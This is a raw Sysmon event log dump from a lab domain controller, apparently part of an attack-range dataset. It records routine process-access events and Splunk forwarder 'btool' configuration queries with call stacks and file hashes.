10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.619{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4324-6000-B000-000000009A01}1844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.619{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4324-6000-B000-000000009A01}1844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.634{08A6967A-4324-6000-B000-000000009A01}1844C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.619{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4325-6000-C200-000000009A01}2584C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4325-6000-C200-000000009A01}2584C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4325-6000-C100-000000009A01}24402444C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4325-6000-C200-000000009A01}2584C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.832{08A6967A-4325-6000-C200-000000009A01}2584C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4325-6000-C100-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4325-6000-C100-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 